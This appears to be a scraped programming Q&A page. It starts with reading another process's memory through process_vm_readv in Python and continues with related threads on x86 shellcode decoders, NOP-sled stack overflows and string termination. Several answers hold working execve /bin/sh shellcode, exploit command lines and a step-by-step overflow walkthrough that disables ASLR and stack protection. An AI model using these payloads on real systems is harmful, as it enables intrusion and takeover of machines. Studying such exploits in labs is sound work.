How to call linux syscall PROCESS_VM_READV within python? - linux

I'm trying to learn how to call PROCESS_VM_READV within python. Reading from the manual, I've decided to create something similar to their example.
I've opened python3 in terminal with root access. Then proceeded by importing&initializing needed modules and variables
import ctypes
libc = ctypes.CDLL('libc.so.6')
vm=libc.process_vm_readv
In the example, there's a struct called iovec. So, I need to re-create it in python
class iovec(ctypes.Structure):
_fields_=[("iov_base",ctypes.c_void_p),("iov_len",ctypes.c_int)]
Then create the variables local and remote
p1=ctypes.c_char_p(b"")
p1=ctypes.cast(p1,ctypes.c_void_p)
local=iovec(p1,10)
remote=iovec(0x00400000,20) # Address of ELF header
Finally, calling PROCESS_VM_READV with pid of KMines
vm(2242,local,2,remote,1,0)
But it returns -1 and there are no changes in iov_base of local or remote. I feel like I'm doing a very simple mistake here but can't quite put my finger on it.
Any help is appreciated, have a nice day.

might be too late here but i was able to replicate the example from the man of process_vm_readv here
we need to pass a valid readable remote address, for testing purpose i compiled a simple hello world and used gdb to read a valid address
(gdb) break main
Breakpoint 1 at 0x5a9: file hello.c, line 4.
(gdb) run
Starting program: /user/Desktop/hello
=> 0x800005a9 <main+25>: sub esp,0xc
0x800005ac <main+28>: lea edx,[eax-0x19b0]
0x800005b2 <main+34>: push edx
0x800005b3 <main+35>: mov ebx,eax
0x800005b5 <main+37>: call 0x800003f0 <puts#plt>
0x800005ba <main+42>: add esp,0x10
0x800005bd <main+45>: nop
0x800005be <main+46>: lea esp,[ebp-0x8]
0x800005c1 <main+49>: pop ecx
0x800005c2 <main+50>: pop ebx
(gdb) x/20b 0x800005a9
0x800005a9 <main+25>: 0x83 0xec 0x0c 0x8d 0x90 0x50 0xe6 0xff
0x800005b1 <main+33>: 0xff 0x52 0x89 0xc3 0xe8 0x36 0xfe 0xff
0x800005b9 <main+41>: 0xff 0x83 0xc4 0x10
Below is the python code to retrieve the same results
from ctypes import *
class iovec(Structure):
_fields_ = [("iov_base",c_void_p),("iov_len",c_size_t)]
local = (iovec*2)() #create local iovec array
remote = (iovec*1)()[0] #create remote iovec
buf1 = (c_char*10)()
buf2 = (c_char*10)()
pid = 25117
local[0].iov_base = cast(byref(buf1),c_void_p)
local[0].iov_len = 10
local[1].iov_base = cast(byref(buf2),c_void_p)
local[1].iov_len = 10
remote.iov_base = c_void_p(0x800005a9) #pass valid readable address
remote.iov_len = 20
libc = CDLL("libc.so.6")
vm = libc.process_vm_readv
vm.argtypes = [c_int, POINTER(iovec), c_ulong, POINTER(iovec), c_ulong, c_ulong]
nread = vm(pid,local,2,remote,1,0)
if nread != -1:
bytes = "[+] "
print "[+] received %s bytes" % (nread)
for i in buf1: bytes += hex(ord(i)) + " "
for i in buf2: bytes += hex(ord(i)) + " "
print bytes
output
user#ubuntu:~/Desktop# python process_vm_readv.py
[+] received 20 bytes
[+] 0x83 0xec 0xc 0x8d 0x90 0x50 0xe6 0xff 0xff 0x52 0x89 0xc3 0xe8 0x36 0xfe 0xff 0xff 0x83 0xc4 0x10

Related

sigsegv on xchg byte [esi+1], al modifying code in the .text section [duplicate]

This question already has answers here:
execve shellcode writing segmentation fault
(1 answer)
How can I make GCC compile the .text section as writable in an ELF binary?
(4 answers)
Closed 2 years ago.
I'm currently working on a shellcode for Linux x86. Currently on my system ASLR and DEP are disabled.
I've implemented a small assembly "decoder" which will swap couple of bytes in my shellcode (is a sample execve) (re-ordering all of it), before directly jumping into it.
Both the shellcode and the assembly decoder are working fine when I assemble them into an object, extract the byte sequence (I already checked, no null bytes :)) and call them from a C function wrapper.
Main problem is that if I assemble the NASM decoder in ELF and try to debug it inside GDB, the decoder will crash with a sigsegv error on line: xchg byte [esi+1], al
Why does it happen in the first place? Why it is not working in GDB when linked and executed directly from ASM but it's perfectly fine when launched from the C wrapper?
Here my decoder in NASM:
global _start
section .text
_start:
jmp short shellcode_section ; goto shellcode_section
decoder: ; decoder's main
pop esi ; load address of our encoded shellcode (encoded_shellcode) into ESI (JMP CALL POP trick)
mul ecx ; trick to clear eax and exc
mov cl, 10 ; loop half the times of our shellcode length as we are swapping two bytes at time (eg. shellcode length is 20)
decode_loop:
mov al, byte [esi] ; load encoded_shellcode's byte pointed by ESI in al | [A][B] al=A
xchg byte [esi+1], al ; swap al value with next byte value (ESI+1) | [A][A] al=B
mov [esi], al ; load swapped byte in al to location pointed by ESI | [B][A]
add esi, 2 ; select next byte "couple"
loop decode_loop ; cl is 0? No, we go back at decode_loop and execute the cicle again
jmp short encoded_shellcode ; cl is 0, we've decoded all our shellcode and we can now directly jump into it
shellcode_section:
call decoder ; goto decoder's main, putting encoded_shellcode on the stack
encoded_shellcode: db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80
I usually assemble the NASM code with: nasm -f elf32 file.nasm
link the object with: ld -m elf_i386 -o out file.o
extract the byte sequence with: objdump -d file.o
And I'm currently using the following C wrapper:
#include<stdio.h>
#include<string.h>
unsigned char code[] = "SHELLCODE";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
compiling it with gcc -m32 -fno-stack-protector -z execstack file.c -o shellcode
Thanks in advance

Why does the amount of NOPs seem to impact whether shellcode is executed successfully?

I'm learning about buffer overflows (for educational purposes only) and while playing around with the NOP sliding technique to execute shellcode some questions arised as to why shellcode sometimes is not executed.
I compiled the following code (using Ubuntu 18.04.1 LTS (x86_64), gcc 7.3.0., ASLR disabled)
#include <stdio.h>
#include <string.h>
void function (char *args)
{
char buff[64];
printf ("%p\n", buff);
strcpy (buff, args);
}
int main (int argc, char *argv[])
{
function (argv[1]);
}
as follows:gcc -g -o main main.c -fno-stack-protector -z execstack.
I then evoked gdb main, b 9, and
run `perl -e '{ print "\x90"x15; \
print "\x48\x31\xc0\xb0\x3b\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe3\x08\x48\xc1\xeb\x08\x53\x48\x89\xe7\x4d\x31\xd2\x41\x52\x57\x48\x89\xe6\x0f\x05"; \
print "\x90"x8; \
print "A"x8; \
print "\xb0\xd8\xff\xff\xff\x7f" }'`
The string above consists of NOPs + shellcode + NOPs + bytes to override the saved frame pointer + bytes to override the return address. I chose the return address according to the output of the printf line. (Attention: To say it explicitly, the hexcode above opens a shell in x86_x64).
As can be seen from the following output, the buffer is overflowed as intended.
(gdb) x/80bx buff
0x7fffffffd8b0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7fffffffd8b8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x48
0x7fffffffd8c0: 0x31 0xc0 0xb0 0x3b 0x48 0x31 0xd2 0x48
0x7fffffffd8c8: 0xbb 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68
0x7fffffffd8d0: 0x11 0x48 0xc1 0xe3 0x08 0x48 0xc1 0xeb
0x7fffffffd8d8: 0x08 0x53 0x48 0x89 0xe7 0x4d 0x31 0xd2
0x7fffffffd8e0: 0x41 0x52 0x57 0x48 0x89 0xe6 0x0f 0x05
0x7fffffffd8e8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7fffffffd8f0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffd8f8: 0xb0 0xd8 0xff 0xff 0xff 0x7f 0x00 0x00
(gdb) info frame 0
[...]
rip = 0x5555555546c1 in function (main.c:9); saved rip = 0x7fffffffd8b0
[...]
Saved registers:
rbp at 0x7fffffffd8f0, rip at 0x7fffffffd8f8
Continuing from here indeed opens the shell. However, when I use the following as an argument (the only difference is that I replaced \x90"x15 by \x90"x16 and \x90"x8 by \x90"x7)
run `perl -e '{ print "\x90"x16; \
print "\x48\x31\xc0\xb0\x3b\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe3\x08\x48\xc1\xeb\x08\x53\x48\x89\xe7\x4d\x31\xd2\x41\x52\x57\x48\x89\xe6\x0f\x05"; \
print "\x90"x7; \
print "A"x8; \
print "\xb0\xd8\xff\xff\xff\x7f" }'`
I get
(gdb) x/80bx buff
0x7fffffffd8b0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7fffffffd8b8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7fffffffd8c0: 0x48 0x31 0xc0 0xb0 0x3b 0x48 0x31 0xd2
0x7fffffffd8c8: 0x48 0xbb 0x2f 0x62 0x69 0x6e 0x2f 0x73
0x7fffffffd8d0: 0x68 0x11 0x48 0xc1 0xe3 0x08 0x48 0xc1
0x7fffffffd8d8: 0xeb 0x08 0x53 0x48 0x89 0xe7 0x4d 0x31
0x7fffffffd8e0: 0xd2 0x41 0x52 0x57 0x48 0x89 0xe6 0x0f
0x7fffffffd8e8: 0x05 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7fffffffd8f0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffd8f8: 0xb0 0xd8 0xff 0xff 0xff 0x7f 0x00 0x00
(gdb) info frame 0
[...]
rip = 0x5555555546c1 in function (main.c:9); saved rip = 0x7fffffffd8b0
[...]
Saved registers:
rbp at 0x7fffffffd8f0, rip at 0x7fffffffd8f8
which looks fine to me (the same as above, except reflecting the change in the argument), though when I continue this time I get
Program received signal SIGILL, Illegal instruction.
0x00007fffffffd8ea in ?? ()
and no shell is opened.
The illegal instruction happens in the second NOP block. The shellclode lies before the NOP block. The return address seems to have been overwritten successfully, why isn't the shellcode executed then?
Why does the first example work, but the second doesn't, the only difference being that one NOP was removed before the shellcode and inserted after the shellcode?
Edit:
I added the disassembly of the shellcode:
0000000000400078 <_start>:
400078: 48 31 c0 xor %rax,%rax
40007b: b0 3b mov $0x3b,%al
40007d: 48 31 d2 xor %rdx,%rdx
400080: 48 bb 2f 62 69 6e 2f movabs $0x1168732f6e69622f,%rbx
400087: 73 68 11
40008a: 48 c1 e3 08 shl $0x8,%rbx
40008e: 48 c1 eb 08 shr $0x8,%rbx
400092: 53 push %rbx
400093: 48 89 e7 mov %rsp,%rdi
400096: 4d 31 d2 xor %r10,%r10
400099: 41 52 push %r10
40009b: 57 push %rdi
40009c: 48 89 e6 mov %rsp,%rsi
40009f: 0f 05 syscall
Jester's guess that the shellcode's push operations overwrite the instructions at the far end of the shell code regarding my second example was correct:
Checking the current instruction after receiving the SIGILL by setting set disassemble-next-line on and repeating the second example yields
Program received signal SIGILL, Illegal instruction.
0x00007fffffffd8ea in ?? ()
=> 0x00007fffffffd8ea: ff (bad)
The NOP (90) which was at this address previously has been overwritten by ff.
How does this happen? Repeat the second example again and additionally set b 8. At this point in time, the buffer has not been overflown yet.
(gdb) info frame 0
[...]
Saved registers:
rbp at 0x7fffffffd8f0, rip at 0x7fffffffd8f8
The bytes starting at 0x7fffffffd8f8 contain the address which will be returned to after having left the function function. Then, this 0x7fffffffd8f8 address will also be the address from which stack will continue to grow again (there, the first 8 bytes will be stored). Indeed, continuing with gdb and using the si command shows that before the first push instruction of the shellcode the stack pointer points to 0x7fffffffd900:
(gdb) si
0x00007fffffffd8da in ?? ()
=> 0x00007fffffffd8da: 53 push %rbx
(gdb) x/8x $sp
0x7fffffffd900: 0xf8 0xd9 0xff 0xff 0xff 0x7f 0x00 0x00
... and when the push instruction is executed the bytes are stored at address 0x7fffffffd8f8:
(gdb) si
0x00007fffffffd8db in ?? ()
=> 0x00007fffffffd8db: 48 89 e7 mov %rsp,%rdi
(gdb) x/8bx $sp
0x7fffffffd8f8: 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x00
Continuing with this, one can see that after the last push instruction of the shellcode the content of push is pushed on the stack at address 0x7fffffffd8e8:
0x00007fffffffd8e3 in ?? ()
=> 0x00007fffffffd8e3: 57 push %rdi
0x00007fffffffd8e4 in ?? ()
=> 0x00007fffffffd8e4: 48 89 e6 mov %rsp,%rsi
(gdb) x/8bx $sp
0x7fffffffd8e8: 0xf8 0xd8 0xff 0xff 0xff 0x7f 0x00 0x00
However, this is also the place where the last byte for the instruction of syscall is stored (see the x/80bx buff output in the question for the second example). Therefore, the syscall and thus the shellcode cannot be executed successfully. This doesn't happen in the first example since then the bytes pushed onto the stack grow right til the end of the shellcode (without overriding a byte of it): 8 bytes for the 8 NOPs ("\x90"x8) + 8 bytes for the saved base pointer + 8 bytes for the return address provide enough space for the 3 push operations.

Different memory alignment for different buffer sizes

I'm trying to educate myself regarding stack overflows and played around a bit with these -fno-stack-protector flag and tried to understand how memory is managed in a process.
I compiled the following code (using Ubuntu 18.04.1 LTS (x86_64), gcc 7.3.0., ASLR disabled)
int main (int argc, char *argv[])
{
char buff[13];
return 0;
}
as follows: gcc -g -o main main.c -fno-stack-protector. I then evoked gdb main, b 4, run and as can be seen from the the following outputs
(gdb) print &buff
$2 = (char (*)[13]) 0x7fffffffd963
0x7fffffffd963: 0xff 0xff 0x7f 0x00 0x00 0x00 0x00 0x00
0x7fffffffd96b: 0x00 0x00 0x00 0x00 0x00 0x10 0x46 0x55
0x7fffffffd973: 0x55 0x55 0x55 0x00 0x00 0x97 0x5b 0xa0
0x7fffffffd97b: 0xf7 0xff 0x7f 0x00 0x00 0x01 0x00 0x00
(gdb) info frame 0
Stack frame at 0x7fffffffd980:
[...]
Saved registers:
rbp at 0x7fffffffd970, rip at 0x7fffffffd978
the 13 bytes allocated for the buffer follow directly after the saved base pointer rbp.
After increasing the buffer size from 13 to 21 I got the following results:
(gdb) print &buff
$3 = (char (*)[21]) 0x7fffffffd950
(gdb) x/48bx buff
0x7fffffffd950: 0x10 0x46 0x55 0x55 0x55 0x55 0x00 0x00
0x7fffffffd958: 0xf0 0x44 0x55 0x55 0x55 0x55 0x00 0x00
0x7fffffffd960: 0x50 0xda 0xff 0xff 0xff 0x7f 0x00 0x00
0x7fffffffd968: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffd970: 0x10 0x46 0x55 0x55 0x55 0x55 0x00 0x00
0x7fffffffd978: 0x97 0x5b 0xa0 0xf7 0xff 0x7f 0x00 0x00
(gdb) info frame 0
Stack frame at 0x7fffffffd980:
[...]
Saved registers:
rbp at 0x7fffffffd970, rip at 0x7fffffffd978
Now there are additional 11 bytes after the rbp before the buffer follows.
In the second case, why are there 11 additional bytes? Is this due to the alignment of the stack, e.g. does the buffer have to be 16 bytes aligned (a multiple of 16) starting from rbp?
Why is the memory layout different in the first case, there seems to be no alignment?
The x86-64 System V ABI requires 16-byte alignment for local or global arrays that are 16 bytes or larger, and for all C99 VLAs (which are always local).
An array uses the same alignment as its elements, except that a local or global
array variable of length at least 16 bytes or a C99 variable-length array variable
always has alignment of at least 16 bytes.4
4 The alignment requirement allows the use of SSE instructions when operating on the array.
The compiler cannot in general calculate the size of a variable-length array (VLA), but it is expected
that most VLAs will require at least 16 bytes, so it is logical to mandate that VLAs have at
least a 16-byte alignment.
Fixed-size arrays smaller than one SIMD vector (16 bytes) don't have this requirement, so they can pack efficiently in the stack layout.
Note that this doesn't apply to arrays inside structs, only to locals and globals.
(For dynamic storage, the alignment of a malloc return value must be aligned enough to hold any object up to that size, and since x86-64 SysV has maxalign_t of 16 bytes, malloc must also return 16-byte aligned pointers if the size is 16 or higher. For smaller allocations, it could return only 8B-aligned for an 8B allocation if it wanted to.)
The requirement for local arrays makes it safe to write code that passes their address to a function that requires 16-byte alignment, but this is mostly not something the ABI itself really needs to specify.
It's not something that different compilers have to agree on to link their code together, the way struct layout or the calling convention is (which registers are call-clobbered, or used for arg-passing...). The compiler basically owns the stack layout for the function it's compiling, and other functions can't assume or depend on anything about it. They'd only get pointers to your local vars if you pass pointers as function args, or store pointers into globals.
Specifying it for globals is useful, though: it makes it safe for compiler-generated auto-vectorized code to assume alignment for global arrays, even when it's an extern int[] in an object file compiled by another compiler.

ASCIIZ string ending with a zero byte

I was writing an Assembly level program to create a file.
.model small
.data
Fn db "test"
.code
mov ax,#data
mov ds,ax
mov CX,00
lea DX,Fn
mov ah,3ch
int 21h
Mov ah,4ch
Into 21h
End
Although program had no errors, but file was not created, so I searched the internet for getting the reason.
Then I found ASCIIZ.
So I replaced data segment with
.data
Fn db "test", 0
It worked.
Why do we need to use ASCIIZ and why can't a normal string be used to create a file?
Let's say you have multiple string into your .data section:
Fn db "test"
s1 db "aaa"
s2 db "bbb"
When you will compile it, .data section will have all 3 strings in it, one after other:
0x74 0x65 0x73 0x74 0x61 0x61 0x61 0x62 0x62 0x62
which is binary representation for testaaabbb.
There must be a way for functions to figure out where first string ends and the second begins. This "marker" is 0x00 byte ( "\x00" ), this is also know as "null byte terminated string" or ASCIIZ, that way you can know where your string is ending:
Fn db "test",0
s1 db "aaa",0x00 ; is the same
s2 db "bbb\x00" ; still same thing
now your .data section will looks like this
0x74 0x65 0x73 0x74 0x00 0x61 0x61 0x61 0x00 0x62 0x62 0x62 0x00
which is test\x00aaa\x00bbb\x00and now you have a delimited between strings so when you provide the starting address of your string to a function, it will know where exactly your string ends.

Buffer overflows on 64 bit

I am trying to do some experiments with buffer overflows for fun. I was reading on this forum on the topic, and tried to write my own little code.
So what I did is a small "C" program, which takes character argument and runs until segmentation fault.
So I supply arguments until I get a message that I overwrote the return address with "A" which is 41. My buffer character length, in which I copy my input strings is [5].
Here is what I did in gdb.
run $(perl -e 'print "A"x32 ; ')
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400516 in main (argc=Cannot access memory at address 0x414141414141412d
Then I figured out that it takes 16 'A' to overwrite.
run $(perl -e 'print "A"x16 . "C"x8 . "B"x32 ; ')
0x0000000000400516 in main (argc=Cannot access memory at address 0x434343434343432f
)
Which tells us that the 8 "C" are overwriting the return address.
According to the online tutorials if I supply a valid adress instead of the 8 "C". I can jump to some place and execute code. So I overloaded the memory after the initial 16 "A".
The next step was to execute
run $(perl -e 'print "A"x16 . "C"x8 . "B"x200 ; ')
rax 0x0 0
rbx 0x3a0001bbc0 249108216768
rcx 0x3a00552780 249113683840
rdx 0x3a00553980 249113688448
rsi 0x42 66
rdi 0x2af9e57710e0 47252785008864
rbp 0x4343434343434343 0x4343434343434343
rsp 0x7fffb261a2e8 0x7fffb261a2e8
r8 0xffffffff 4294967295
r9 0x0 0
r10 0x22 34
r11 0xffffffff 4294967295
r12 0x0 0
r13 0x7fffb261a3c0 140736186131392
r14 0x0 0
r15 0x0 0
rip 0x400516 0x400516 <main+62>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x0 0
ftag 0xffff 65535
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
mxcsr 0x1f80 [ IM DM ZM OM UM PM ]
After examining the memory 200 bytes after $rsp i found an address and I did the following:
run $(perl -e 'print "A"x16 . "\x38\xd0\xcb\x9b\xff\x7f" . "\x90"x50 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" ; ')
This however does not do anything. I would be grateful if someone can give me an idea what am I doing wrong.
First make sure that you change the randomize_va_space. On Ubuntu you would run the following as root
echo 0 > /proc/sys/kernel/randomize_va_space
Next make sure you are compiling the test program without stack smashing protection and set the memory execution bit. Compile it with the following gcc options to accomplish
-fno-stack-protector -z execstack
Also I found I needed more space to actually execute a shell so I would change your buffer to something more like buffer[64]
Next you can run the app in gdb and get the stack address you need to return to
First set a breakpoint right after the strcpy
(gdb) disassemble main
Dump of assembler code for function main:
0x000000000040057c <+0>: push %rbp
0x000000000040057d <+1>: mov %rsp,%rbp
0x0000000000400580 <+4>: sub $0x50,%rsp
0x0000000000400584 <+8>: mov %edi,-0x44(%rbp)
0x0000000000400587 <+11>: mov %rsi,-0x50(%rbp)
0x000000000040058b <+15>: mov -0x50(%rbp),%rax
0x000000000040058f <+19>: add $0x8,%rax
0x0000000000400593 <+23>: mov (%rax),%rdx
0x0000000000400596 <+26>: lea -0x40(%rbp),%rax
0x000000000040059a <+30>: mov %rdx,%rsi
0x000000000040059d <+33>: mov %rax,%rdi
0x00000000004005a0 <+36>: callq 0x400450 <strcpy#plt>
0x0000000000**4005a5** <+41>: lea -0x40(%rbp),%rax
0x00000000004005a9 <+45>: mov %rax,%rsi
0x00000000004005ac <+48>: mov $0x400674,%edi
0x00000000004005b1 <+53>: mov $0x0,%eax
0x00000000004005b6 <+58>: callq 0x400460 <printf#plt>
0x00000000004005bb <+63>: mov $0x0,%eax
0x00000000004005c0 <+68>: leaveq
0x00000000004005c1 <+69>: retq
End of assembler dump.
(gdb) b *0x4005a5
Breakpoint 1 at 0x4005a5
Then run the app and at the break point grab the rax register address.
(gdb) run `python -c 'print "A"*128';`
Starting program: APPPATH/APPNAME `python -c 'print "A"*128';`
Breakpoint 1, 0x00000000004005a5 in main ()
(gdb) info register
rax 0x7fffffffe030 140737488347136
rbx 0x0 0
rcx 0x4141414141414141 4702111234474983745
rdx 0x41 65
rsi 0x7fffffffe490 140737488348304
rdi 0x7fffffffe077 140737488347255
rbp 0x7fffffffe040 0x7fffffffe040
rsp 0x7fffffffdff0 0x7fffffffdff0
r8 0x7ffff7dd4e80 140737351863936
r9 0x7ffff7de9d60 140737351949664
r10 0x7fffffffdd90 140737488346512
r11 0x7ffff7b8fd60 140737349483872
r12 0x400490 4195472
r13 0x7fffffffe120 140737488347424
r14 0x0 0
r15 0x0 0
rip 0x4005a5 0x4005a5 <main+41>
eflags 0x206 [ PF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb)
Next determine your max buffer size. I know that the buffer of 64 crashes at 72 bytes so I will just go from that.. You could use something like metasploits pattern methods to give you this or just figure it out from trial and error running the app to find out the exact byte count it takes before getting a segfault or make up a pattern of your own and match the rip address like you would with the metasploit pattern option.
Next, there are many different ways to get the payload you need but since we are running a 64bit app, we will use a 64bit payload. I compiled C and then grabbed the ASM from gdb and then made some changes to remove the \x00 chars by changing the mov instructions to xor for the null values and then shl and shr to remove them from the shell command. We will show this later but for now the payload is as follows.
\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05
our payload here is 48 bytes so we have 72 - 48 = 24
We can pad the payload with \x90 (nop) so that instruction will not be interrupted. Ill add 2 at the end of the payload and 22 at the beginning. Also I will tack on the return address that we want to the end in reverse giving the following..
`python -c 'print "\x90"*22+"\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05\x90\x90\x30\xe0\xff\xff\xff\x7f"';`
Now if you want to run it outside of gdb, you may have to fudge with the return address. In my case the address becomes \x70\xe0\xff\xff\xff\x7f outside of gdb. I just increased it until it worked by going to 40 then 50 then 60 then 70..
test app source
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char name[64];
strcpy(name, argv[1]);
printf("Arg[1] is :%s\n", name);
return 0;
}
This is the payload in C
#include <stdlib.h>
int main()
{
execve("/bin/sh", NULL, NULL);
}
And payload in ASM which will build and run
int main() {
__asm__(
"mov $0x0,%rdx\n\t" // arg 3 = NULL
"mov $0x0,%rsi\n\t" // arg 2 = NULL
"mov $0x0068732f6e69622f,%rdi\n\t"
"push %rdi\n\t" // push "/bin/sh" onto stack
"mov %rsp,%rdi\n\t" // arg 1 = stack pointer = start of /bin/sh
"mov $0x3b,%rax\n\t" // syscall number = 59
"syscall\n\t"
);
}
And since we can't use \x00 we can change to xor the values and do some fancy shifting to remove the bad values of the mov for setting up /bin/sh
int main() {
__asm__(
"xor %rdx,%rdx\n\t" // arg 3 = NULL
"mov %rdx,%rsi\n\t" // arg 2 = NULL
"mov $0x1168732f6e69622f,%rdi\n\t"
"shl $0x8,%rdi\n\t"
"shr $0x8,%rdi\n\t" // first byte = 0 (8 bits)
"push %rdi\n\t" // push "/bin/sh" onto stack
"mov %rsp,%rdi\n\t" // arg 1 = stack ptr = start of /bin/sh
"mov $0x111111111111113b,%rax\n\t" // syscall number = 59
"shl $0x38,%rax\n\t"
"shr $0x38,%rax\n\t" // first 7 bytes = 0 (56 bits)
"syscall\n\t"
);
}
if you compile that payload, run it under gdb you can get the byte values you need such as
(gdb) x/bx main+4
0x400478 <main+4>: 0x48
(gdb)
0x400479 <main+5>: 0x31
(gdb)
0x40047a <main+6>: 0xd2
(gdb)
or get it all by doing something like
(gdb) x/48bx main+4
0x4004f0 <main+4>: 0x48 0x31 0xd2 0x48 0x89 0xd6 0x48 0xbf
0x4004f8 <main+12>: 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x11
0x400500 <main+20>: 0x48 0xc1 0xe7 0x08 0x48 0xc1 0xef 0x08
0x400508 <main+28>: 0x57 0x48 0x89 0xe7 0x48 0xb8 0x3b 0x11
0x400510 <main+36>: 0x11 0x11 0x11 0x11 0x11 0x11 0x48 0xc1
0x400518 <main+44>: 0xe0 0x38 0x48 0xc1 0xe8 0x38 0x0f 0x05
Well for starters... Are you entirely sure that the address on the stack is the return pointer and not a pointer to say a data structure or string somewhere? If that is the case it will use that address instead of the string and could just end up doing nothing :)
So check if your function uses local variables as these are put on the stack after the return address. Hope this helps ^_^ And good luck!
i haven't worked with x64 much , but a quick look says you have 16 bytes till rip overwrite.
instead of the \x90 try \xCC's to see if controlled code redirection has occured, if it has gdb should hit(land in the \xCC pool) the \xCC and pause (\xCC are in a way 'hardcoded' breakpoints).

Resources